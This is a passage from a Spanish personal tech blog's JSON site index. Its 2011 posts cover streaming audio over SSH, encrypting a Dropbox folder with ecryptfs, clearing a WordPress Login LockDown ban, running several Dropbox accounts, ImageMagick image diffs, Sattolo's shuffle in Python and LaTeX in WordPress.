little endian, 44100, stereo) [-f S16_LE -c2 -r44100] -f cdr (16 bit big endian, 44100, stereo) [-f S16_BE -c2 -f44100] -f dat (16 bit little endian, 48000, stereo) [-f S16_LE -c2 -r48000] Por defecto, se utiliza (8 bit little endian, 8000, mono) [-f U8 -c1 -r8000] Redirigir el micrófono remoto a los altavoces locales Como en el caso anterior, pero a la inversa:\n$ ssh -C user@host arecord -f dat | aplay -f dat Si queremos guardar el audio que recibimos mientras lo escuchamos:\n$ ssh -C user@host arecord -f dat | tee audio.wav | aplay -f dat Supongo que también se debe poder utilizar dd para traer el sonido captado por un micrófono remoto, pero no lo he podido probar.\nEnviar texto y que se oiga por los altavoces remotos El texto puede ser algo que acabemos de escribir, el contenido de un fichero o la salida por stdout de un script.\nPara esto, podemos utilizar cualquier sintentizador de voz, por ejemplo, espeak o festival.\n$ echo \u0026#34;Hola, mundo\u0026#34; | ssh user@host espeak -ves $ echo \u0026#34;Hello, world\u0026#34; | ssh user@host espeak $ echo \u0026#34;I am an alien\u0026#34; | ssh user@host festival --tts $ echo \u0026#34;Una ranita iba caminando\u0026#34; | ssh user@host festival --tts --language spanish $ cat textos.txt | ssh user@host espeak -ves $ w3m -dump http://www.gnu.org/licenses/gpl-2.0.txt | ssh user@host espeak Si queremos parar la locución, deberemos iniciar sesión en la máquina remota y matar el proceso espeak o festival. Dicho sea de paso, para escuchar la voz en castellano usando el festival hay que instalar el paquete festvox-ellpc11k.\nRecibir texto y que se oiga por nuestros altavoces El caso inverso al anterior:\n$ ssh user@host cat textos.txt | espeak -ves $ ssh user@host w3m -dump http://www.gnu.org/licenses/gpl-2.0.txt | espeak Reproducir un archivo de audio en los altavoces remotos Para escuchar un archivo de audio remoto utilizaremos mplayer:\n$ cat podcast.ogg | ssh -C user@host mplayer - Reproducir un archivo de audio de la máquina remota en local Al revés del caso anterior.\n$ ssh -C user@host cat podcast.ogg | mplayer - Reproducir el sonido de un video en los altavoces remotos Es idéntico al caso de un archivo de audio, pero le pasamos a mplayer el argumento -vc null para que no decodifique el vídeo.\n$ ssh -C user@host cat podcast.ogg | mplayer -vc null - Reproducir el sonido de un vídeo remoto en nuestra máquina Podemos conseguir que se vea y escuche el vídeo:\n$ ssh -C user@host cat movie.ogv | mplayer - O que sólo se escuche el audio:\n$ ssh -C user@host cat movie.ogv | mplayer -vc null - ","permalink":"http://karpoke.ignaciocano.com/2011/05/05/sonido-a-traves-de-ssh/","summary":"\u003cp\u003eSi tenemos \u003ca href=\"/2011/03/03/conectarse-por-ssh-solo-usando-la-clave/\"\u003eacceso por \u003ccode\u003essh\u003c/code\u003e\u003c/a\u003e a otro ordenador, ambos con micrófono y\naltavoces, podemos redirigir el sonido en ambos sentidos, es decir,\npodemos conseguir cosas como:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eque lo que capta nuestro \u003ca href=\"#microfono-local-altavoces-remotos\"\u003emicrófono\u003c/a\u003e se escuche en los altavoces\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edel otro ordenador y [viceversa][]\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eque lo que se \u003ca href=\"#texto-local-altavoces-remotos\"\u003eescribe\u003c/a\u003e en un ordenador se escuche en el otro y\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e[viceversa][1]\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eque el contenido de un \u003ca href=\"#texto-local-altavoces-remotos\"\u003efichero de texto\u003c/a\u003e se oiga en los\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ealtavoces remotos y [viceversa][1]\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eque un archivo de \u003ca href=\"#fichero-audio-local-altavoces-remotos\"\u003eaudio\u003c/a\u003e se escuche en los altavoces remotos y\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e[viceversa][2]\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eque el audio de un archivo de \u003ca href=\"#fichero-video-local-altavoces-remotos\"\u003evídeo\u003c/a\u003e se escuche en los altavoces\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eremotos y [viceversa][3]\n\u003c/code\u003e\u003c/pre\u003e\u003ch2 id=\"dispositivos-de-sonido-en-ubuntu-maverick-meerkat\"\u003eDispositivos de sonido en Ubuntu Maverick Meerkat\u003c/h2\u003e\n\u003cp\u003eUno de los cambios de Ubuntu Maverick Meerkat (10.10) fue la\ndesaparición del dispositivo \u003ccode\u003e/dev/dsp\u003c/code\u003e y otros, como \u003ccode\u003e/dev/mixer\u003c/code\u003e,\n\u003ccode\u003e/dev/sndstat\u003c/code\u003e y \u003ccode\u003e/dev/audio\u003c/code\u003e, al utilizar la \u003ca href=\"http://bugs.launchpad.net/ubuntu/+source/linux/+bug/634211\"\u003einterfaz ALSA en\ndetrimento de la OSS API\u003c/a\u003e.\u003c/p\u003e","title":"Sonido a través de SSH"},{"content":"A raíz del cambio en los términos del servicio de Dropbox, en el cual se afirma que le entregará tus ficheros al gobierno de Estados Unidos, si éste se lo pide, o la noticia de que es posible saltarse las restricciones, y que nuestra cuenta sea usada en otra máquina sin necesidad de conocer nuestra contraseña, se nos podría ocurrir cifrar los datos que subimos a nuestra cuenta.\nUtilizaremos ecryptfs para cifrar un directorio, y todo su contenido, dentro del directorio de una de nuestras cuentas de Dropbox.\nFuente: Linux Journal\nSupongamos que el directorio Dropbox se encuentra en /home/user/.dropbox/Dropbox. Crearemos dos directorios, uno dentro de este directorio, con el contenido cifrado, y otro fuera, donde lo montaremos:\n$ mkdir -m 500 ~/ecryptDropbox $ mkdir -m 700 ~/.dropbox/Dropbox/ecryptDropbox $ sudo mount -t ecryptfs ~/.dropbox/Dropbox/ecryptDropbox ~/ecryptDropbox Passphrase: Select cipher: 1) aes: blocksize = 16; min keysize = 16; max keysize = 32 (not loaded) 2) blowfish: blocksize = 16; min keysize = 16; max keysize = 56 (not loaded) 3) des3_ede: blocksize = 8; min keysize = 24; max keysize = 24 (not loaded) 4) twofish: blocksize = 16; min keysize = 16; max keysize = 32 (not loaded) 5) cast6: blocksize = 16; min keysize = 16; max keysize = 32 (not loaded) 6) cast5: blocksize = 8; min keysize = 5; max keysize = 16 (not loaded) Selection [aes]: Select key bytes: 1) 16 2) 32 3) 24 Selection [16]: 2 \u0026#34;16\u0026#34; Enable plaintext passthrough (y/n) [n]: Enable filename encryption (y/n) [n]: y \u0026#34;n\u0026#34; Filename Encryption Key (FNEK) Signature [f873fb2794e1bb82]: Attempting to mount with the following options: ecryptfs_unlink_sigs ecryptfs_fnek_sig=f873fb2794e1bb82 ecryptfs_key_bytes=32 ecryptfs_cipher=aes ecryptfs_sig=f873fb2794e1bb82 WARNING: Based on the contents of [/root/.ecryptfs/sig-cache.txt], it looks like you have never mounted with this key before. This could mean that you have typed your passphrase wrong. Would you like to proceed with the mount (yes/no)? : yes Would you like to append sig [f873fb2794e1bb82] to [/root/.ecryptfs/sig-cache.txt] in order to avoid this warning in the future (yes/no)? : yes Mounted eCryptfs La passphrase es la contraseña utilizada para montar el directorio. Luego especificamos el algoritmo de cifrado y la longitud de la clave. La opción passthrought permite guardar ficheros sin cifrar. Luego podemos escoger cifrar también los nombres de fichero, e incluso escoger una clave distinta para el nombre y para el fichero.\nEste es el contenido que tendremos en nuestra cuenta de Dropbox:\n$ touch ~/ecryptDropbox/myfile $ ls ~/.dropbox/Dropbox/ecryptDropbox ECRYPTFS_FNEK_ENCRYPTED.FWbsAyi5CB4yVkY0czFjSWaXh52n0e59-VIQYq1x1vpJm6ZBDtj-4PILQwWaU-- !Dropbox ecryptfs\nPara que el directorio se monte al arrancar el sistema deberemos añadir al fichero /etc/fstab, pasándole las opciones directamente:\n/home/user/.dropbox/Dropbox/ecryptDropbox /home/user/ecryptDropbox ecryptfs user,rw,ecryptfs_sig=f873fb2794e1bb82,ecryptfs_fnek_sig=f873fb2794e1bb82,ecryptfs_key_bytes=32,ecryptfs_cipher=aes,ecryptfs_unlink_sigs,ecryptfs_passthrough=no,key=passphrase:passwd=UsedPasswordToEncrypt 0 0 A la hora de montarlo, deberemos especificar las opciones que hemos escogido a la hora de crearlo:\necryptfs_sig: es la clave que se utiliza para cifrar los ficheros. ecryptfs_fnek_sig: es la clave que se utiliza para cifrar los nombres de los ficheros. ecryptfs_cipher: es el algoritmo de cifrado a utilizar. ecryptfs_key_bytes: es la longitud de la clave para cifrar. ecryptfs_passthrough: especifica si se va a permitir guardar ficheros sin cifrar. ecryptfs_unlink_sigs: especifica que se vacie el anillo de claves cada vez que se desmonta el directorio, key=tipo:opciones. especifica el tipo de contraseña que vamos a utilizar y algunas opciones. El tipo se corresponde con uno de los módulos instalados en `/usr/lib*/ecryptfs/`, como mínimo suelen ser `passphrase` y `ssl`. Las opciones pueden ser: - `passwd` para especificar la contraseña directamente, - `passwd_file` para utilizar un fichero que contiene la contraseña en la forma `passwd=contraseña`, - `passwd_fd` para utilizar un descriptor de fichero, - `passstdin` para pedir la contraseña al usuario, - `salt` para especificar un valor hexadecimal de 16 bits como la sal, - `keyfile` para especificar el fichero que contiene una clave SSL o RSA. Si queremos que nos pida la contraseña cada vez que se monte, en lugar de la línea anterior, pondríamos:\n/home/user/.dropbox/Dropbox/ecryptDropbox /home/user/ecryptDropbox ecryptfs user,rw,noauto,ecryptfs_sig=f873fb2794e1bb82,ecryptfs_fnek_sig=f873fb2794e1bb82,ecryptfs_key_bytes=32,ecryptfs_cipher=aes,ecryptfs_unlink_sigs,ecryptfs_passthrough=no 0 0 Para comprobar que funciona correctamente, desmontamos previamente el directorio y lo volvemos a montar:\n$ sudo umount ~/ecryptDropbox $ mount ~/ecryptDropbox -o ecryptfs_sig=f873fb2794e1bb82,ecryptfs_fnek_sig=f873fb2794e1bb82,ecryptfs_key_bytes=32,ecryptfs_cipher=aes,ecryptfs_unlink_sigs,ecryptfs_passthrough=no Passphrase: Si esto nos devuelve el siguiente error:\nError attempting to evaluate mount options: [-22] Invalid argument Check your system logs for details on why this happened. Try updating your ecryptfs-utils package, and/or submit a bug report on https://launchpad.net/ecryptfs Tenemos dos opciones, o bien añadimos el bit de sutuid al comando mount.ecryptfs, o bien lo montamos como root.\nReferencias En el directorio público de mi cuenta de Dropbox tengo subidos varios ezines sobre GNU/Linux, software libre, programación y seguridad.\nEn el directorio público de Ubuntu One tengo subidos varios libros y artículos sobre GNU/Linux, software libre, programación y seguridad.\n","permalink":"http://karpoke.ignaciocano.com/2011/04/21/cifrar-el-contenido-de-dropbox/","summary":"\u003cp\u003eA raíz del cambio en los términos del servicio de Dropbox, en el cual se\nafirma que le \u003ca href=\"http://www.businessinsider.com/dropbox-updates-security-terms-of-service-to-say-it-can-decrpyt-files-if-the-government-asks-it-to-2011-4?op=1\"\u003eentregará tus ficheros al gobierno de Estados Unidos\u003c/a\u003e,\nsi éste se lo pide, o la noticia de que es posible \u003ca href=\"http://www.hispasec.com/unaaldia/4558\"\u003esaltarse las\nrestricciones\u003c/a\u003e, y que nuestra cuenta sea usada en otra máquina sin\nnecesidad de conocer nuestra contraseña, se nos podría ocurrir cifrar\nlos datos que subimos a nuestra cuenta.\u003c/p\u003e\n\u003cp\u003eUtilizaremos \u003ccode\u003eecryptfs\u003c/code\u003e para cifrar un directorio, y todo su contenido,\ndentro del directorio de \u003ca href=\"/2011/03/30/multiples-cuentas-de-dropbox-en-ubuntu-maverick-meerkat/\"\u003euna de nuestras cuentas de Dropbox\u003c/a\u003e.\u003c/p\u003e","title":"Cifrar el contenido de Dropbox"},{"content":"De forma similar a fail2ban para ssh, existe un complemento para Wordpress, Login LockDown, que controla el número de intentos de acceso al panel de control, y si se falla en 3 intentos, banea dicha IP durante una hora. Estos parámetros, y alguno más, son configurables desde la página de configuración del complemento.\nEl problema es que si compartimos la misma IP pública con más gente, ya sea porque estamos en un lugar público o en casa de unos amigos, y alguien en esta misma red realiza más intentos de los permitidos, también nosotros quedamos baneados.\nSi tenemos acceso por ssh al servidor donde se encuentra la base de datos, podemos hacer lo siguiente para desbanearnos:\n$ mysql -u wordpress -p wordpress mysql\u0026gt; select * from wp_lockdowns; +-------------+---------+---------------------+---------------------+--------------+ | lockdown_ID | user_id | lockdown_date | release_date | lockdown_IP | +-------------+---------+---------------------+---------------------+--------------+ | 1 | 1 | 2011-04-19 18:58:05 | 2011-04-19 19:58:05 | 80.58.0.33 | +-------------+---------+---------------------+---------------------+--------------+ 1 row in set (0.00 sec) mysql\u0026gt; delete from wp_lockdowns where lockdown_ID=1; Query OK, 1 row affected (0.00 sec) ","permalink":"http://karpoke.ignaciocano.com/2011/04/20/acceder-al-panel-de-control-de-wordpress-tras-haber-sido-baneado/","summary":"\u003cp\u003eDe forma similar a \u003ca href=\"/2011/03/07/detectando-intrusos-en-ubuntu-maverick-meerkat/\"\u003e\u003ccode\u003efail2ban\u003c/code\u003e para \u003ccode\u003essh\u003c/code\u003e\u003c/a\u003e, existe un\ncomplemento para Wordpress, \u003ca href=\"http://wordpress.org/extend/plugins/login-lockdown/\"\u003eLogin LockDown\u003c/a\u003e, que controla el número de\nintentos de acceso al panel de control, y si se falla en 3 intentos, \u003cem\u003ebanea\u003c/em\u003e\ndicha IP durante una hora. Estos parámetros, y alguno más, son configurables\ndesde la página de configuración del complemento.\u003c/p\u003e\n\u003cp\u003eEl problema es que si compartimos la misma IP pública con más gente, ya sea\nporque estamos en un lugar público o en casa de unos amigos, y alguien en esta\nmisma red realiza más intentos de los permitidos, también nosotros quedamos\n\u003cem\u003ebaneados\u003c/em\u003e.\u003c/p\u003e","title":"Acceder al panel de control de Wordpress tras haber sido baneado"},{"content":"$ man true NAME true - do nothing, successfully SYNOPSIS true [ignored command line arguments] true OPTION DESCRIPTION Exit with a status code indicating success. --help display this help and exit --version output version information and exit NOTE: your shell may have its own version of true, which usually supersedes the version described here. Please refer to your shell\u0026#39;s documentation for details about the options it supports. No hay nada como hacer sólo una cosa, pero hacerla bien\u0026hellip;\n","permalink":"http://karpoke.ignaciocano.com/2011/04/19/true/","summary":"\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ man true\nNAME\n       true - do nothing, successfully\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eSYNOPSIS\n       true [ignored command line arguments]\n       true OPTION\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eDESCRIPTION\n       Exit with a status code indicating success.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e       --help display this help and exit\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e       --version\n              output version information and exit\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e       NOTE:  your  shell may have its own version of true, which usually supersedes\n       the version described here.  Please refer to your\n       shell\u0026#39;s documentation for details about the options it supports.\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eNo hay nada como hacer sólo una cosa, pero hacerla bien\u0026hellip;\u003c/p\u003e","title":"true"},{"content":"Una cuenta gratuita de Dropbox permite inicialmente 2 GB de espacio, que se pueden ir ampliando con algunas sencillas acciones tales como compartir un directorio, instalar el paquete para Ubuntu o recomendárselo a un amigo. En principio, sólo se puede tener una cuenta por dispositivo. Sin embargo, como vamos a ver, gestionar varias cuentas para obtener más espacio, utilizándolas a la vez y desde la misma máquina, es algo realmente sencillo y rápido.\nCreamos una nueva cuenta Lo mejor es mandarnos una invitación a nosotros mismos y así conseguir 250MB de espacio adicional para cada una. Si nos habíamos registrado con una cuenta de GMail, podemos poner la misma cuenta de correo, introduciendo uno o varios puntos en el nombre de usuario, por ejemplo, user.name@gmail.com.\nCreamos el directorio para la nueva cuenta:\n$ mkdir ~/.dropbox2 Lanzamos la instalación en este directorio:\n$ HOME=~/.dropbox2 /usr/bin/dropbox start -i Sin embargo, en Ubuntu Maverick Meerkat da el siguiente error:\nStarting Dropbox...Traceback (most recent call last): File \u0026#34;/usr/bin/dropbox\u0026#34;, line 259, in handle_ok self.dont_show_again_align.hide() AttributeError: \u0026#39;DownloadDialog\u0026#39; object has no attribute \u0026#39;dont_show_again_align\u0026#39; Vamos a ver que pasa si comentamos la línea 259 en el fichero /usr/bin/dropbox:\n#self.dont_show_again_align.hide() Actualizado el 4 de febrero de 2012 Este fichero viene con el paquete nautilus-dropbox. La versión que tengo instalada es la 0.6.8, pero actualmente ya van por la versión 0.7.1, por lo que es posible que el número de línea haya cambiado.\nLo volvemos a ejecutar, y funciona! Nos aparecerá el asistente y configuramos la nueva cuenta o creamos una. El directorio de la nueva cuenta de Dropbox está en ~/.dropbox2/Dropbox.\nGestionar varias cuentas Ahora, para que sea más sencillo gestionar todas las cuentas y que se ejecuten al inicio, haremos lo siguiente.\nDesactivamos el autoarranque de la cuenta de Dropbox que ya teníamos.\nPara tenerlo todo un poco más ordenado, vamos a mover las credenciales de la cuenta que ya teníamos al directorio ~/.dropbox1:\n$ cd ~ $ mkdir .dropbox1 $ mv .dropbox .dropbox-dist Dropbox .dropbox1 $ ln -s .Xauthority .dropbox $ ln -s .Xauthority .dropbox2 Nos debería quedar así:\n$ ls -lan .dropbox1 total 28 drwxr-xr-x 5 1000 1000 4096 2011-03-30 14:13 . drwxr-xr-x 157 1000 1000 12288 2011-03-30 14:16 .. drwxr-xr-x 3 1000 1000 4096 2011-03-30 13:45 .dropbox drwxr-xr-x 6 1000 1000 4096 2011-03-30 13:02 Dropbox drwxr-xr-x 4 1000 1000 4096 2010-10-28 11:43 .dropbox-dist lrwxrwxrwx 1 1000 1000 14 2011-03-30 14:13 .Xauthority -\u0026gt; ../.Xauthority $ ls -lan .dropbox2 total 28 drwxr-xr-x 5 1000 1000 4096 2011-03-30 14:13 . drwxr-xr-x 157 1000 1000 12288 2011-03-30 14:16 .. drwxr-xr-x 3 1000 1000 4096 2011-03-30 13:46 .dropbox drwxr-xr-x 5 1000 1000 4096 2011-03-30 13:36 Dropbox drwxr-xr-x 5 1000 1000 4096 2011-03-30 13:33 .dropbox-dist lrwxrwxrwx 1 1000 1000 14 2011-03-30 14:13 .Xauthority -\u0026gt; ../.Xauthority El siguiente script, MultipleDropboxInstances.sh, se encarga de lanzar una instancia de Dropbox por cada cuenta que tengamos instalada:\n#!/bin/bash #__***************************__ # Multiple dropbox instances #__***************************__ dropboxes=\u0026#34;.dropbox .dropbox2\u0026#34; for dropbox in $dropboxes do HOME=/home/$USER if ! [ -d $HOME/$dropbox ];then mkdir $HOME/$dropbox 2\u0026gt; /dev/null ln -s $HOME/.Xauthority $HOME/$dropbox/ 2\u0026gt; /dev/null fi HOME=$HOME/$dropbox /usr/bin/dropbox start -i 2\u0026gt; /dev/null \u0026amp; done Le damos permisos de ejecución:\n$ chmod +x MultipleDropboxInstances.sh Lo ejecutamos:\n$ ./MultipleDropboxInstances.sh Starting Dropbox...Starting Dropbox...Done! Done! En la barra superior nos aparecerán dos iconos de Dropbox, uno por cada cuenta. Si utilizamos Unity y no nos aparece, podemos recurrir a un truco para añadir el icono de Dropbox al área de notificación.\nActualizado el 17 de marzo de 2012 La versión actual de Dropbox, 0.7.1, es compatible con Unity, por lo que no es necesario recurrir al truco mencionado.\nPara que se ejecute cada vez al inicio, en el fichero /etc/rc.local, añadimos:\nsu username /home/username/MultipleDropboxInstances.sh Referencias » En el directorio público de mi cuenta de Dropbox tengo subidos varios ezines sobre GNU/Linux, software libre, programación y seguridad. » En el directorio público de Ubuntu One tengo subidos varios libros y artículos sobre GNU/Linux, software libre, programación y seguridad.\n","permalink":"http://karpoke.ignaciocano.com/2011/03/30/multiples-cuentas-de-dropbox-en-ubuntu-maverick-meerkat/","summary":"\u003cp\u003eUna cuenta gratuita de Dropbox permite inicialmente 2 GB de espacio, que\nse pueden ir ampliando con algunas sencillas acciones tales como\ncompartir un directorio, instalar el paquete para Ubuntu o\nrecomendárselo a un amigo. En principio, sólo se puede tener una cuenta\npor dispositivo. Sin embargo, como vamos a ver, gestionar varias cuentas\npara obtener más espacio, utilizándolas a la vez y desde la misma\nmáquina, es algo realmente sencillo y rápido.\u003c/p\u003e","title":"Múltiples cuentas de Dropbox en Ubuntu Maverick Meerkat"},{"content":"Supongamos que queremos encontrar las diferencias en la siguiente imagen:\nFuente: taringa.net\nTal como se muestra en la tira cómica, se puede hacer utilizando las herramientas de la suite imagemagick, en particular, composite.\nPrimero, creamos una imagen con cada mitad de la imagen original:\n$ convert diferencias.jpg -crop 50%x100% out.png Esto crea dos ficheros, out-0.png y out-0.png, uno con la mitad izquierda y otro con la mitad izquierda.\nVamos a obtener las diferencias:\n$ composite out-0.png out-1.png -compose difference diferencias-out.png ","permalink":"http://karpoke.ignaciocano.com/2011/03/29/encuentra-las-diferencias-desde-el-terminal/","summary":"\u003cp\u003eSupongamos que queremos \u003ca href=\"http://www.linuxhispano.net/2011/03/29/diferencias/\"\u003eencontrar las diferencias\u003c/a\u003e en la siguiente\nimagen:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"diferencias\" loading=\"lazy\" src=\"/images/diferencias-300x233.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://www.taringa.net/posts/imagenes/6577248/encuentra-las-diferencias.html\"\u003etaringa.net\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eTal como se muestra en la tira cómica, se puede hacer utilizando las\nherramientas de la suite \u003ccode\u003eimagemagick\u003c/code\u003e, en particular, \u003ccode\u003ecomposite\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003ePrimero, creamos una imagen con cada mitad de la imagen original:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ convert diferencias.jpg -crop 50%x100% out.png\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEsto crea dos ficheros, \u003ccode\u003eout-0.png\u003c/code\u003e y \u003ccode\u003eout-0.png\u003c/code\u003e, uno con la mitad\nizquierda y otro con la mitad izquierda.\u003c/p\u003e\n\u003cp\u003eVamos a obtener las diferencias:\u003c/p\u003e","title":"Encuentra las diferencias... desde el terminal"},{"content":"Si tenemos una lista de elementos, por ejemplo:\n\u0026gt;\u0026gt;\u0026gt; l = [ 2, 3, 5, 7, 11, 13, 17, 19 ] Y queremos desordenarla, pero con la condición de que ningún elemento ocupe la misma posición que ocupaba originalmente, podemos aplicar el algoritmo de Sottolo:\n\u0026gt;\u0026gt;\u0026gt; from random import randrange \u0026gt;\u0026gt;\u0026gt; def sattoloCycle(items): ... i = len(items) ... while i \u0026gt; 1: ... i = i - 1 ... j = randrange(i) # 0 \u0026lt; = j \u0026lt;= i-1 ... items[j], items[i] = items[i], items[j] ... return \u0026gt;\u0026gt;\u0026gt; sattoloCycle(l) \u0026gt;\u0026gt;\u0026gt; print l [5, 17, 3, 2, 7, 11, 13] ","permalink":"http://karpoke.ignaciocano.com/2011/03/29/desordenando-listas-en-python/","summary":"\u003cp\u003eSi tenemos una lista de elementos, por ejemplo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026gt;\u0026gt;\u0026gt; l = [ 2, 3, 5, 7, 11, 13, 17, 19 ]\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Deck Card Shuffler\" loading=\"lazy\" src=\"/images/deck_card_shuffler-300x213.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eY queremos desordenarla, pero con la condición de que ningún elemento\nocupe la misma posición que ocupaba originalmente, podemos aplicar el\n\u003ca href=\"http://en.wikipedia.org/wiki/Fisher%E2%80%93Yates_shuffle#Sattolo.27s_algorithm\"\u003ealgoritmo de Sottolo\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026gt;\u0026gt;\u0026gt; from random import randrange\n\u0026gt;\u0026gt;\u0026gt; def sattoloCycle(items):\n...     i = len(items)\n...     while i \u0026gt; 1:\n...         i = i - 1\n...         j = randrange(i)  # 0 \u0026lt; = j \u0026lt;= i-1\n...         items[j], items[i] = items[i], items[j]\n...     return\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026gt;\u0026gt;\u0026gt; sattoloCycle(l)\n\u0026gt;\u0026gt;\u0026gt; print l\n[5, 17, 3, 2, 7, 11, 13]\n\u003c/code\u003e\u003c/pre\u003e","title":"Desordenando listas en Python"},{"content":"Descarga el plugin de LaTeX para Wordpress. Luego, escribe:\n\\begin{align*} ax^2+bx+c \u0026amp;= 0 \\\\ x^2+\\frac{b}{a}x+\\frac{c}{a} \u0026amp;= 0 \\\\ x^2+\\frac{b}{a}x \u0026amp;= -\\frac{c}{a} \\\\ x^2+\\frac{b}{a}x+\\frac{b^2}{4a^2} \u0026amp;= \\frac{b^2}{4a^2} - \\frac{c}{a} \\\\ (x+\\frac{b}{2a})^2 \u0026amp;= \\frac{b^2}{4a^2} - \\frac{4ac}{4a^2} \\\\ x+\\frac{b}{2a} \u0026amp;= \\pm\\sqrt{\\frac{b^2-4ac}{4a^2}} \\\\ x+\\frac{b}{2a} \u0026amp;= \\frac{\\pm\\sqrt{b^2-4ac}}{2a} \\\\ x \u0026amp;= \\frac{-b\\pm\\sqrt{b^2-4ac}}{2a} \\end{align*} El resultado será parecido a éste:\n$$ \\begin{align*} ax^2+bx+c \u0026= 0 \\\\ x^2+\\frac{b}{a}x+\\frac{c}{a} \u0026= 0 \\\\ x^2+\\frac{b}{a}x \u0026= -\\frac{c}{a} \\\\ x^2+\\frac{b}{a}x+\\frac{b^2}{4a^2} \u0026= \\frac{b^2}{4a^2} - \\frac{c}{a} \\\\ (x+\\frac{b}{2a})^2 \u0026= \\frac{b^2}{4a^2} - \\frac{4ac}{4a^2} \\\\ x+\\frac{b}{2a} \u0026= \\pm\\sqrt{\\frac{b^2-4ac}{4a^2}} \\\\ x+\\frac{b}{2a} \u0026= \\frac{\\pm\\sqrt{b^2-4ac}}{2a} \\\\ x \u0026= \\frac{-b\\pm\\sqrt{b^2-4ac}}{2a} \\end{align*} $$ ","permalink":"http://karpoke.ignaciocano.com/2011/03/29/latex-en-wordpress/","summary":"\u003cp\u003eDescarga el \u003ca href=\"http://wordpress.org/extend/plugins/latex/\"\u003eplugin de LaTeX para Wordpress\u003c/a\u003e. Luego, escribe:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-latex\" data-lang=\"latex\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003e\\begin\u003c/span\u003e{align*}\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eax^2+bx+c \u0026amp;= 0 \u003cspan style=\"color:#66d9ef\"\u003e\\\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ex^2+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b}{a}x+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{c}{a} \u0026amp;= 0 \u003cspan style=\"color:#66d9ef\"\u003e\\\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ex^2+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b}{a}x \u0026amp;= -\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{c}{a} \u003cspan style=\"color:#66d9ef\"\u003e\\\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ex^2+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b}{a}x+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b^2}{4a^2} \u0026amp;= \u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b^2}{4a^2} - \u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{c}{a} \u003cspan style=\"color:#66d9ef\"\u003e\\\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e(x+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b}{2a})^2 \u0026amp;= \u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b^2}{4a^2} - \u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{4ac}{4a^2} \u003cspan style=\"color:#66d9ef\"\u003e\\\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ex+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b}{2a} \u0026amp;= \u003cspan style=\"color:#66d9ef\"\u003e\\pm\\sqrt\u003c/span\u003e{\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b^2-4ac}{4a^2}} \u003cspan 